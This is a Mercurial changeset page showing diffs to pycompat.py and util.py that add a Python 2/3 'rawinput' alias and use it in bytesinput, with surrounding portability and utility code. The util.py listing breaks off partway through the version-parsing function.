##// END OF EJS Templates
py3: select input or raw_input by pycompat...
Yuya Nishihara -
r33853:cfcfbe6c default
parent child Browse files
Show More
@@ -1,461 +1,463
1 1 # pycompat.py - portability shim for python 3
2 2 #
3 3 # This software may be used and distributed according to the terms of the
4 4 # GNU General Public License version 2 or any later version.
5 5
6 6 """Mercurial portability shim for python 3.
7 7
8 8 This contains aliases to hide python version-specific details from the core.
9 9 """
10 10
11 11 from __future__ import absolute_import
12 12
13 13 import getopt
14 14 import os
15 15 import shlex
16 16 import sys
17 17
18 18 ispy3 = (sys.version_info[0] >= 3)
19 19 ispypy = (r'__pypy__' in sys.builtin_module_names)
20 20
21 21 if not ispy3:
22 22 import cookielib
23 23 import cPickle as pickle
24 24 import httplib
25 25 import Queue as _queue
26 26 import SocketServer as socketserver
27 27 import xmlrpclib
28 28 else:
29 29 import http.cookiejar as cookielib
30 30 import http.client as httplib
31 31 import pickle
32 32 import queue as _queue
33 33 import socketserver
34 34 import xmlrpc.client as xmlrpclib
35 35
36 36 empty = _queue.Empty
37 37 queue = _queue.Queue
38 38
39 39 def identity(a):
40 40 return a
41 41
42 42 if ispy3:
43 43 import builtins
44 44 import functools
45 45 import io
46 46 import struct
47 47
48 48 fsencode = os.fsencode
49 49 fsdecode = os.fsdecode
50 50 oslinesep = os.linesep.encode('ascii')
51 51 osname = os.name.encode('ascii')
52 52 ospathsep = os.pathsep.encode('ascii')
53 53 ossep = os.sep.encode('ascii')
54 54 osaltsep = os.altsep
55 55 if osaltsep:
56 56 osaltsep = osaltsep.encode('ascii')
57 57 # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
58 58 # returns bytes.
59 59 getcwd = os.getcwdb
60 60 sysplatform = sys.platform.encode('ascii')
61 61 sysexecutable = sys.executable
62 62 if sysexecutable:
63 63 sysexecutable = os.fsencode(sysexecutable)
64 64 stringio = io.BytesIO
65 65 maplist = lambda *args: list(map(*args))
66 rawinput = input
66 67
67 68 # TODO: .buffer might not exist if std streams were replaced; we'll need
68 69 # a silly wrapper to make a bytes stream backed by a unicode one.
69 70 stdin = sys.stdin.buffer
70 71 stdout = sys.stdout.buffer
71 72 stderr = sys.stderr.buffer
72 73
73 74 # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on Unix,
74 75 # we can use os.fsencode() to get back bytes argv.
75 76 #
76 77 # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
77 78 #
78 79 # TODO: On Windows, the native argv is wchar_t, so we'll need a different
79 80 # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
80 81 if getattr(sys, 'argv', None) is not None:
81 82 sysargv = list(map(os.fsencode, sys.argv))
82 83
83 84 bytechr = struct.Struct('>B').pack
84 85
85 86 class bytestr(bytes):
86 87 """A bytes which mostly acts as a Python 2 str
87 88
88 89 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
89 90 (b'', b'foo', b'ascii', b'1')
90 91 >>> s = bytestr(b'foo')
91 92 >>> assert s is bytestr(s)
92 93
93 94 __bytes__() should be called if provided:
94 95
95 96 >>> class bytesable(object):
96 97 ... def __bytes__(self):
97 98 ... return b'bytes'
98 99 >>> bytestr(bytesable())
99 100 b'bytes'
100 101
101 102 There's no implicit conversion from non-ascii str as its encoding is
102 103 unknown:
103 104
104 105 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
105 106 Traceback (most recent call last):
106 107 ...
107 108 UnicodeEncodeError: ...
108 109
109 110 Comparison between bytestr and bytes should work:
110 111
111 112 >>> assert bytestr(b'foo') == b'foo'
112 113 >>> assert b'foo' == bytestr(b'foo')
113 114 >>> assert b'f' in bytestr(b'foo')
114 115 >>> assert bytestr(b'f') in b'foo'
115 116
116 117 Sliced elements should be bytes, not integer:
117 118
118 119 >>> s[1], s[:2]
119 120 (b'o', b'fo')
120 121 >>> list(s), list(reversed(s))
121 122 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
122 123
123 124 As bytestr type isn't propagated across operations, you need to cast
124 125 bytes to bytestr explicitly:
125 126
126 127 >>> s = bytestr(b'foo').upper()
127 128 >>> t = bytestr(s)
128 129 >>> s[0], t[0]
129 130 (70, b'F')
130 131
131 132 Be careful to not pass a bytestr object to a function which expects
132 133 bytearray-like behavior.
133 134
134 135 >>> t = bytes(t) # cast to bytes
135 136 >>> assert type(t) is bytes
136 137 """
137 138
138 139 def __new__(cls, s=b''):
139 140 if isinstance(s, bytestr):
140 141 return s
141 142 if (not isinstance(s, (bytes, bytearray))
142 143 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
143 144 s = str(s).encode(u'ascii')
144 145 return bytes.__new__(cls, s)
145 146
146 147 def __getitem__(self, key):
147 148 s = bytes.__getitem__(self, key)
148 149 if not isinstance(s, bytes):
149 150 s = bytechr(s)
150 151 return s
151 152
152 153 def __iter__(self):
153 154 return iterbytestr(bytes.__iter__(self))
154 155
155 156 def iterbytestr(s):
156 157 """Iterate bytes as if it were a str object of Python 2"""
157 158 return map(bytechr, s)
158 159
159 160 def sysbytes(s):
160 161 """Convert an internal str (e.g. keyword, __doc__) back to bytes
161 162
162 163 This never raises UnicodeEncodeError, but only ASCII characters
163 164 can be round-trip by sysstr(sysbytes(s)).
164 165 """
165 166 return s.encode(u'utf-8')
166 167
167 168 def sysstr(s):
168 169 """Return a keyword str to be passed to Python functions such as
169 170 getattr() and str.encode()
170 171
171 172 This never raises UnicodeDecodeError. Non-ascii characters are
172 173 considered invalid and mapped to arbitrary but unique code points
173 174 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
174 175 """
175 176 if isinstance(s, builtins.str):
176 177 return s
177 178 return s.decode(u'latin-1')
178 179
179 180 def strurl(url):
180 181 """Converts a bytes url back to str"""
181 182 return url.decode(u'ascii')
182 183
183 184 def bytesurl(url):
184 185 """Converts a str url to bytes by encoding in ascii"""
185 186 return url.encode(u'ascii')
186 187
187 188 def raisewithtb(exc, tb):
188 189 """Raise exception with the given traceback"""
189 190 raise exc.with_traceback(tb)
190 191
191 192 def getdoc(obj):
192 193 """Get docstring as bytes; may be None so gettext() won't confuse it
193 194 with _('')"""
194 195 doc = getattr(obj, u'__doc__', None)
195 196 if doc is None:
196 197 return doc
197 198 return sysbytes(doc)
198 199
199 200 def _wrapattrfunc(f):
200 201 @functools.wraps(f)
201 202 def w(object, name, *args):
202 203 return f(object, sysstr(name), *args)
203 204 return w
204 205
205 206 # these wrappers are automagically imported by hgloader
206 207 delattr = _wrapattrfunc(builtins.delattr)
207 208 getattr = _wrapattrfunc(builtins.getattr)
208 209 hasattr = _wrapattrfunc(builtins.hasattr)
209 210 setattr = _wrapattrfunc(builtins.setattr)
210 211 xrange = builtins.range
211 212 unicode = str
212 213
213 214 def open(name, mode='r', buffering=-1):
214 215 return builtins.open(name, sysstr(mode), buffering)
215 216
216 217 def getoptb(args, shortlist, namelist):
217 218 """
218 219 Takes bytes arguments, converts them to unicode, pass them to
219 220 getopt.getopt(), convert the returned values back to bytes and then
220 221 return them for Python 3 compatibility as getopt.getopt() don't accepts
221 222 bytes on Python 3.
222 223 """
223 224 args = [a.decode('latin-1') for a in args]
224 225 shortlist = shortlist.decode('latin-1')
225 226 namelist = [a.decode('latin-1') for a in namelist]
226 227 opts, args = getopt.getopt(args, shortlist, namelist)
227 228 opts = [(a[0].encode('latin-1'), a[1].encode('latin-1'))
228 229 for a in opts]
229 230 args = [a.encode('latin-1') for a in args]
230 231 return opts, args
231 232
232 233 def strkwargs(dic):
233 234 """
234 235 Converts the keys of a python dictonary to str i.e. unicodes so that
235 236 they can be passed as keyword arguments as dictonaries with bytes keys
236 237 can't be passed as keyword arguments to functions on Python 3.
237 238 """
238 239 dic = dict((k.decode('latin-1'), v) for k, v in dic.iteritems())
239 240 return dic
240 241
241 242 def byteskwargs(dic):
242 243 """
243 244 Converts keys of python dictonaries to bytes as they were converted to
244 245 str to pass that dictonary as a keyword argument on Python 3.
245 246 """
246 247 dic = dict((k.encode('latin-1'), v) for k, v in dic.iteritems())
247 248 return dic
248 249
249 250 # TODO: handle shlex.shlex().
250 251 def shlexsplit(s):
251 252 """
252 253 Takes bytes argument, convert it to str i.e. unicodes, pass that into
253 254 shlex.split(), convert the returned value to bytes and return that for
254 255 Python 3 compatibility as shelx.split() don't accept bytes on Python 3.
255 256 """
256 257 ret = shlex.split(s.decode('latin-1'))
257 258 return [a.encode('latin-1') for a in ret]
258 259
259 260 else:
260 261 import cStringIO
261 262
262 263 bytechr = chr
263 264 bytestr = str
264 265 iterbytestr = iter
265 266 sysbytes = identity
266 267 sysstr = identity
267 268 strurl = identity
268 269 bytesurl = identity
269 270
270 271 # this can't be parsed on Python 3
271 272 exec('def raisewithtb(exc, tb):\n'
272 273 ' raise exc, None, tb\n')
273 274
274 275 def fsencode(filename):
275 276 """
276 277 Partial backport from os.py in Python 3, which only accepts bytes.
277 278 In Python 2, our paths should only ever be bytes, a unicode path
278 279 indicates a bug.
279 280 """
280 281 if isinstance(filename, str):
281 282 return filename
282 283 else:
283 284 raise TypeError(
284 285 "expect str, not %s" % type(filename).__name__)
285 286
286 287 # In Python 2, fsdecode() has a very chance to receive bytes. So it's
287 288 # better not to touch Python 2 part as it's already working fine.
288 289 fsdecode = identity
289 290
290 291 def getdoc(obj):
291 292 return getattr(obj, '__doc__', None)
292 293
293 294 def getoptb(args, shortlist, namelist):
294 295 return getopt.getopt(args, shortlist, namelist)
295 296
296 297 strkwargs = identity
297 298 byteskwargs = identity
298 299
299 300 oslinesep = os.linesep
300 301 osname = os.name
301 302 ospathsep = os.pathsep
302 303 ossep = os.sep
303 304 osaltsep = os.altsep
304 305 stdin = sys.stdin
305 306 stdout = sys.stdout
306 307 stderr = sys.stderr
307 308 if getattr(sys, 'argv', None) is not None:
308 309 sysargv = sys.argv
309 310 sysplatform = sys.platform
310 311 getcwd = os.getcwd
311 312 sysexecutable = sys.executable
312 313 shlexsplit = shlex.split
313 314 stringio = cStringIO.StringIO
314 315 maplist = map
316 rawinput = raw_input
315 317
316 318 class _pycompatstub(object):
317 319 def __init__(self):
318 320 self._aliases = {}
319 321
320 322 def _registeraliases(self, origin, items):
321 323 """Add items that will be populated at the first access"""
322 324 items = map(sysstr, items)
323 325 self._aliases.update(
324 326 (item.replace(sysstr('_'), sysstr('')).lower(), (origin, item))
325 327 for item in items)
326 328
327 329 def _registeralias(self, origin, attr, name):
328 330 """Alias ``origin``.``attr`` as ``name``"""
329 331 self._aliases[sysstr(name)] = (origin, sysstr(attr))
330 332
331 333 def __getattr__(self, name):
332 334 try:
333 335 origin, item = self._aliases[name]
334 336 except KeyError:
335 337 raise AttributeError(name)
336 338 self.__dict__[name] = obj = getattr(origin, item)
337 339 return obj
338 340
339 341 httpserver = _pycompatstub()
340 342 urlreq = _pycompatstub()
341 343 urlerr = _pycompatstub()
342 344 if not ispy3:
343 345 import BaseHTTPServer
344 346 import CGIHTTPServer
345 347 import SimpleHTTPServer
346 348 import urllib2
347 349 import urllib
348 350 import urlparse
349 351 urlreq._registeraliases(urllib, (
350 352 "addclosehook",
351 353 "addinfourl",
352 354 "ftpwrapper",
353 355 "pathname2url",
354 356 "quote",
355 357 "splitattr",
356 358 "splitpasswd",
357 359 "splitport",
358 360 "splituser",
359 361 "unquote",
360 362 "url2pathname",
361 363 "urlencode",
362 364 ))
363 365 urlreq._registeraliases(urllib2, (
364 366 "AbstractHTTPHandler",
365 367 "BaseHandler",
366 368 "build_opener",
367 369 "FileHandler",
368 370 "FTPHandler",
369 371 "HTTPBasicAuthHandler",
370 372 "HTTPDigestAuthHandler",
371 373 "HTTPHandler",
372 374 "HTTPPasswordMgrWithDefaultRealm",
373 375 "HTTPSHandler",
374 376 "install_opener",
375 377 "ProxyHandler",
376 378 "Request",
377 379 "urlopen",
378 380 ))
379 381 urlreq._registeraliases(urlparse, (
380 382 "urlparse",
381 383 "urlunparse",
382 384 ))
383 385 urlerr._registeraliases(urllib2, (
384 386 "HTTPError",
385 387 "URLError",
386 388 ))
387 389 httpserver._registeraliases(BaseHTTPServer, (
388 390 "HTTPServer",
389 391 "BaseHTTPRequestHandler",
390 392 ))
391 393 httpserver._registeraliases(SimpleHTTPServer, (
392 394 "SimpleHTTPRequestHandler",
393 395 ))
394 396 httpserver._registeraliases(CGIHTTPServer, (
395 397 "CGIHTTPRequestHandler",
396 398 ))
397 399
398 400 else:
399 401 import urllib.parse
400 402 urlreq._registeraliases(urllib.parse, (
401 403 "splitattr",
402 404 "splitpasswd",
403 405 "splitport",
404 406 "splituser",
405 407 "urlparse",
406 408 "urlunparse",
407 409 ))
408 410 urlreq._registeralias(urllib.parse, "unquote_to_bytes", "unquote")
409 411 import urllib.request
410 412 urlreq._registeraliases(urllib.request, (
411 413 "AbstractHTTPHandler",
412 414 "BaseHandler",
413 415 "build_opener",
414 416 "FileHandler",
415 417 "FTPHandler",
416 418 "ftpwrapper",
417 419 "HTTPHandler",
418 420 "HTTPSHandler",
419 421 "install_opener",
420 422 "pathname2url",
421 423 "HTTPBasicAuthHandler",
422 424 "HTTPDigestAuthHandler",
423 425 "HTTPPasswordMgrWithDefaultRealm",
424 426 "ProxyHandler",
425 427 "Request",
426 428 "url2pathname",
427 429 "urlopen",
428 430 ))
429 431 import urllib.response
430 432 urlreq._registeraliases(urllib.response, (
431 433 "addclosehook",
432 434 "addinfourl",
433 435 ))
434 436 import urllib.error
435 437 urlerr._registeraliases(urllib.error, (
436 438 "HTTPError",
437 439 "URLError",
438 440 ))
439 441 import http.server
440 442 httpserver._registeraliases(http.server, (
441 443 "HTTPServer",
442 444 "BaseHTTPRequestHandler",
443 445 "SimpleHTTPRequestHandler",
444 446 "CGIHTTPRequestHandler",
445 447 ))
446 448
447 449 # urllib.parse.quote() accepts both str and bytes, decodes bytes
448 450 # (if necessary), and returns str. This is wonky. We provide a custom
449 451 # implementation that only accepts bytes and emits bytes.
450 452 def quote(s, safe=r'/'):
451 453 s = urllib.parse.quote_from_bytes(s, safe=safe)
452 454 return s.encode('ascii', 'strict')
453 455
454 456 # urllib.parse.urlencode() returns str. We use this function to make
455 457 # sure we return bytes.
456 458 def urlencode(query, doseq=False):
457 459 s = urllib.parse.urlencode(query, doseq=doseq)
458 460 return s.encode('ascii')
459 461
460 462 urlreq.quote = quote
461 463 urlreq.urlencode = urlencode
@@ -1,3776 +1,3773
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import os
30 30 import platform as pyplatform
31 31 import re as remod
32 32 import shutil
33 33 import signal
34 34 import socket
35 35 import stat
36 36 import string
37 37 import subprocess
38 38 import sys
39 39 import tempfile
40 40 import textwrap
41 41 import time
42 42 import traceback
43 43 import warnings
44 44 import zlib
45 45
46 46 from . import (
47 47 encoding,
48 48 error,
49 49 i18n,
50 50 policy,
51 51 pycompat,
52 52 )
53 53
54 54 base85 = policy.importmod(r'base85')
55 55 osutil = policy.importmod(r'osutil')
56 56 parsers = policy.importmod(r'parsers')
57 57
58 58 b85decode = base85.b85decode
59 59 b85encode = base85.b85encode
60 60
61 61 cookielib = pycompat.cookielib
62 62 empty = pycompat.empty
63 63 httplib = pycompat.httplib
64 64 httpserver = pycompat.httpserver
65 65 pickle = pycompat.pickle
66 66 queue = pycompat.queue
67 67 socketserver = pycompat.socketserver
68 68 stderr = pycompat.stderr
69 69 stdin = pycompat.stdin
70 70 stdout = pycompat.stdout
71 71 stringio = pycompat.stringio
72 72 urlerr = pycompat.urlerr
73 73 urlreq = pycompat.urlreq
74 74 xmlrpclib = pycompat.xmlrpclib
75 75
76 76 # workaround for win32mbcs
77 77 _filenamebytestr = pycompat.bytestr
78 78
79 79 def isatty(fp):
80 80 try:
81 81 return fp.isatty()
82 82 except AttributeError:
83 83 return False
84 84
85 85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 87 # buffering
88 88 if isatty(stdout):
89 89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 90
91 91 if pycompat.osname == 'nt':
92 92 from . import windows as platform
93 93 stdout = platform.winstdout(stdout)
94 94 else:
95 95 from . import posix as platform
96 96
97 97 _ = i18n._
98 98
99 99 bindunixsocket = platform.bindunixsocket
100 100 cachestat = platform.cachestat
101 101 checkexec = platform.checkexec
102 102 checklink = platform.checklink
103 103 copymode = platform.copymode
104 104 executablepath = platform.executablepath
105 105 expandglobs = platform.expandglobs
106 106 explainexit = platform.explainexit
107 107 findexe = platform.findexe
108 108 gethgcmd = platform.gethgcmd
109 109 getuser = platform.getuser
110 110 getpid = os.getpid
111 111 groupmembers = platform.groupmembers
112 112 groupname = platform.groupname
113 113 hidewindow = platform.hidewindow
114 114 isexec = platform.isexec
115 115 isowner = platform.isowner
116 116 listdir = osutil.listdir
117 117 localpath = platform.localpath
118 118 lookupreg = platform.lookupreg
119 119 makedir = platform.makedir
120 120 nlinks = platform.nlinks
121 121 normpath = platform.normpath
122 122 normcase = platform.normcase
123 123 normcasespec = platform.normcasespec
124 124 normcasefallback = platform.normcasefallback
125 125 openhardlinks = platform.openhardlinks
126 126 oslink = platform.oslink
127 127 parsepatchoutput = platform.parsepatchoutput
128 128 pconvert = platform.pconvert
129 129 poll = platform.poll
130 130 popen = platform.popen
131 131 posixfile = platform.posixfile
132 132 quotecommand = platform.quotecommand
133 133 readpipe = platform.readpipe
134 134 rename = platform.rename
135 135 removedirs = platform.removedirs
136 136 samedevice = platform.samedevice
137 137 samefile = platform.samefile
138 138 samestat = platform.samestat
139 139 setbinary = platform.setbinary
140 140 setflags = platform.setflags
141 141 setsignalhandler = platform.setsignalhandler
142 142 shellquote = platform.shellquote
143 143 spawndetached = platform.spawndetached
144 144 split = platform.split
145 145 sshargs = platform.sshargs
146 146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 147 statisexec = platform.statisexec
148 148 statislink = platform.statislink
149 149 testpid = platform.testpid
150 150 umask = platform.umask
151 151 unlink = platform.unlink
152 152 username = platform.username
153 153
154 154 try:
155 155 recvfds = osutil.recvfds
156 156 except AttributeError:
157 157 pass
158 158 try:
159 159 setprocname = osutil.setprocname
160 160 except AttributeError:
161 161 pass
162 162
163 163 # Python compatibility
164 164
165 165 _notset = object()
166 166
167 167 # disable Python's problematic floating point timestamps (issue4836)
168 168 # (Python hypocritically says you shouldn't change this behavior in
169 169 # libraries, and sure enough Mercurial is not a library.)
170 170 os.stat_float_times(False)
171 171
172 172 def safehasattr(thing, attr):
173 173 return getattr(thing, attr, _notset) is not _notset
174 174
175 175 def bytesinput(fin, fout, *args, **kwargs):
176 176 sin, sout = sys.stdin, sys.stdout
177 177 try:
178 178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 if pycompat.ispy3:
180 return encoding.strtolocal(input(*args, **kwargs))
181 else:
182 return raw_input(*args, **kwargs)
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
183 180 finally:
184 181 sys.stdin, sys.stdout = sin, sout
185 182
186 183 def bitsfrom(container):
187 184 bits = 0
188 185 for bit in container:
189 186 bits |= bit
190 187 return bits
191 188
192 189 # python 2.6 still have deprecation warning enabled by default. We do not want
193 190 # to display anything to standard user so detect if we are running test and
194 191 # only use python deprecation warning in this case.
195 192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
196 193 if _dowarn:
197 194 # explicitly unfilter our warning for python 2.7
198 195 #
199 196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
200 197 # However, module name set through PYTHONWARNINGS was exactly matched, so
201 198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
202 199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
203 200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
204 201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
205 202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
206 203
207 204 def nouideprecwarn(msg, version, stacklevel=1):
208 205 """Issue an python native deprecation warning
209 206
210 207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
211 208 """
212 209 if _dowarn:
213 210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
214 211 " update your code.)") % version
215 212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
216 213
217 214 DIGESTS = {
218 215 'md5': hashlib.md5,
219 216 'sha1': hashlib.sha1,
220 217 'sha512': hashlib.sha512,
221 218 }
222 219 # List of digest types from strongest to weakest
223 220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
224 221
225 222 for k in DIGESTS_BY_STRENGTH:
226 223 assert k in DIGESTS
227 224
228 225 class digester(object):
229 226 """helper to compute digests.
230 227
231 228 This helper can be used to compute one or more digests given their name.
232 229
233 230 >>> d = digester(['md5', 'sha1'])
234 231 >>> d.update('foo')
235 232 >>> [k for k in sorted(d)]
236 233 ['md5', 'sha1']
237 234 >>> d['md5']
238 235 'acbd18db4cc2f85cedef654fccc4a4d8'
239 236 >>> d['sha1']
240 237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
241 238 >>> digester.preferred(['md5', 'sha1'])
242 239 'sha1'
243 240 """
244 241
245 242 def __init__(self, digests, s=''):
246 243 self._hashes = {}
247 244 for k in digests:
248 245 if k not in DIGESTS:
249 246 raise Abort(_('unknown digest type: %s') % k)
250 247 self._hashes[k] = DIGESTS[k]()
251 248 if s:
252 249 self.update(s)
253 250
254 251 def update(self, data):
255 252 for h in self._hashes.values():
256 253 h.update(data)
257 254
258 255 def __getitem__(self, key):
259 256 if key not in DIGESTS:
260 257 raise Abort(_('unknown digest type: %s') % k)
261 258 return self._hashes[key].hexdigest()
262 259
263 260 def __iter__(self):
264 261 return iter(self._hashes)
265 262
266 263 @staticmethod
267 264 def preferred(supported):
268 265 """returns the strongest digest type in both supported and DIGESTS."""
269 266
270 267 for k in DIGESTS_BY_STRENGTH:
271 268 if k in supported:
272 269 return k
273 270 return None
274 271
275 272 class digestchecker(object):
276 273 """file handle wrapper that additionally checks content against a given
277 274 size and digests.
278 275
279 276 d = digestchecker(fh, size, {'md5': '...'})
280 277
281 278 When multiple digests are given, all of them are validated.
282 279 """
283 280
284 281 def __init__(self, fh, size, digests):
285 282 self._fh = fh
286 283 self._size = size
287 284 self._got = 0
288 285 self._digests = dict(digests)
289 286 self._digester = digester(self._digests.keys())
290 287
291 288 def read(self, length=-1):
292 289 content = self._fh.read(length)
293 290 self._digester.update(content)
294 291 self._got += len(content)
295 292 return content
296 293
297 294 def validate(self):
298 295 if self._size != self._got:
299 296 raise Abort(_('size mismatch: expected %d, got %d') %
300 297 (self._size, self._got))
301 298 for k, v in self._digests.items():
302 299 if v != self._digester[k]:
303 300 # i18n: first parameter is a digest name
304 301 raise Abort(_('%s mismatch: expected %s, got %s') %
305 302 (k, v, self._digester[k]))
306 303
307 304 try:
308 305 buffer = buffer
309 306 except NameError:
310 307 def buffer(sliceable, offset=0, length=None):
311 308 if length is not None:
312 309 return memoryview(sliceable)[offset:offset + length]
313 310 return memoryview(sliceable)[offset:]
314 311
315 312 closefds = pycompat.osname == 'posix'
316 313
317 314 _chunksize = 4096
318 315
319 316 class bufferedinputpipe(object):
320 317 """a manually buffered input pipe
321 318
322 319 Python will not let us use buffered IO and lazy reading with 'polling' at
323 320 the same time. We cannot probe the buffer state and select will not detect
324 321 that data are ready to read if they are already buffered.
325 322
326 323 This class let us work around that by implementing its own buffering
327 324 (allowing efficient readline) while offering a way to know if the buffer is
328 325 empty from the output (allowing collaboration of the buffer with polling).
329 326
330 327 This class lives in the 'util' module because it makes use of the 'os'
331 328 module from the python stdlib.
332 329 """
333 330
334 331 def __init__(self, input):
335 332 self._input = input
336 333 self._buffer = []
337 334 self._eof = False
338 335 self._lenbuf = 0
339 336
340 337 @property
341 338 def hasbuffer(self):
342 339 """True is any data is currently buffered
343 340
344 341 This will be used externally a pre-step for polling IO. If there is
345 342 already data then no polling should be set in place."""
346 343 return bool(self._buffer)
347 344
348 345 @property
349 346 def closed(self):
350 347 return self._input.closed
351 348
352 349 def fileno(self):
353 350 return self._input.fileno()
354 351
355 352 def close(self):
356 353 return self._input.close()
357 354
358 355 def read(self, size):
359 356 while (not self._eof) and (self._lenbuf < size):
360 357 self._fillbuffer()
361 358 return self._frombuffer(size)
362 359
363 360 def readline(self, *args, **kwargs):
364 361 if 1 < len(self._buffer):
365 362 # this should not happen because both read and readline end with a
366 363 # _frombuffer call that collapse it.
367 364 self._buffer = [''.join(self._buffer)]
368 365 self._lenbuf = len(self._buffer[0])
369 366 lfi = -1
370 367 if self._buffer:
371 368 lfi = self._buffer[-1].find('\n')
372 369 while (not self._eof) and lfi < 0:
373 370 self._fillbuffer()
374 371 if self._buffer:
375 372 lfi = self._buffer[-1].find('\n')
376 373 size = lfi + 1
377 374 if lfi < 0: # end of file
378 375 size = self._lenbuf
379 376 elif 1 < len(self._buffer):
380 377 # we need to take previous chunks into account
381 378 size += self._lenbuf - len(self._buffer[-1])
382 379 return self._frombuffer(size)
383 380
384 381 def _frombuffer(self, size):
385 382 """return at most 'size' data from the buffer
386 383
387 384 The data are removed from the buffer."""
388 385 if size == 0 or not self._buffer:
389 386 return ''
390 387 buf = self._buffer[0]
391 388 if 1 < len(self._buffer):
392 389 buf = ''.join(self._buffer)
393 390
394 391 data = buf[:size]
395 392 buf = buf[len(data):]
396 393 if buf:
397 394 self._buffer = [buf]
398 395 self._lenbuf = len(buf)
399 396 else:
400 397 self._buffer = []
401 398 self._lenbuf = 0
402 399 return data
403 400
404 401 def _fillbuffer(self):
405 402 """read data to the buffer"""
406 403 data = os.read(self._input.fileno(), _chunksize)
407 404 if not data:
408 405 self._eof = True
409 406 else:
410 407 self._lenbuf += len(data)
411 408 self._buffer.append(data)
412 409
413 410 def popen2(cmd, env=None, newlines=False):
414 411 # Setting bufsize to -1 lets the system decide the buffer size.
415 412 # The default for bufsize is 0, meaning unbuffered. This leads to
416 413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
417 414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
418 415 close_fds=closefds,
419 416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
420 417 universal_newlines=newlines,
421 418 env=env)
422 419 return p.stdin, p.stdout
423 420
424 421 def popen3(cmd, env=None, newlines=False):
425 422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
426 423 return stdin, stdout, stderr
427 424
428 425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
429 426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
430 427 close_fds=closefds,
431 428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
432 429 stderr=subprocess.PIPE,
433 430 universal_newlines=newlines,
434 431 env=env)
435 432 return p.stdin, p.stdout, p.stderr, p
436 433
437 434 def version():
438 435 """Return version information if available."""
439 436 try:
440 437 from . import __version__
441 438 return __version__.version
442 439 except ImportError:
443 440 return 'unknown'
444 441
445 442 def versiontuple(v=None, n=4):
446 443 """Parses a Mercurial version string into an N-tuple.
447 444
448 445 The version string to be parsed is specified with the ``v`` argument.
449 446 If it isn't defined, the current Mercurial version string will be parsed.
450 447
451 448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
452 449 returned values:
453 450
454 451 >>> v = '3.6.1+190-df9b73d2d444'
455 452 >>> versiontuple(v, 2)
456 453 (3, 6)
457 454 >>> versiontuple(v, 3)
458 455 (3, 6, 1)
459 456 >>> versiontuple(v, 4)
460 457 (3, 6, 1, '190-df9b73d2d444')
461 458
462 459 >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
463 460 (3, 6, 1, '190-df9b73d2d444+20151118')
464 461
465 462 >>> v = '3.6'
466 463 >>> versiontuple(v, 2)
467 464 (3, 6)
468 465 >>> versiontuple(v, 3)
469 466 (3, 6, None)
470 467 >>> versiontuple(v, 4)
471 468 (3, 6, None, None)
472 469
473 470 >>> v = '3.9-rc'
474 471 >>> versiontuple(v, 2)
475 472 (3, 9)
476 473 >>> versiontuple(v, 3)
477 474 (3, 9, None)
478 475 >>> versiontuple(v, 4)
479 476 (3, 9, None, 'rc')
480 477
481 478 >>> v = '3.9-rc+2-02a8fea4289b'
482 479 >>> versiontuple(v, 2)
483 480 (3, 9)
484 481 >>> versiontuple(v, 3)
485 482 (3, 9, None)
486 483 >>> versiontuple(v, 4)
487 484 (3, 9, None, 'rc+2-02a8fea4289b')
488 485 """
489 486 if not v:
490 487 v = version()
491 488 parts = remod.split('[\+-]', v, 1)
492 489 if len(parts) == 1:
493 490 vparts, extra = parts[0], None
494 491 else:
495 492 vparts, extra = parts
496 493
497 494 vints = []
498 495 for i in vparts.split('.'):
499 496 try:
500 497 vints.append(int(i))
501 498 except ValueError:
502 499 break
503 500 # (3, 6) -> (3, 6, None)
504 501 while len(vints) < 3:
505 502 vints.append(None)
506 503
507 504 if n == 2:
508 505 return (vints[0], vints[1])
509 506 if n == 3:
510 507 return (vints[0], vints[1], vints[2])
511 508 if n == 4:
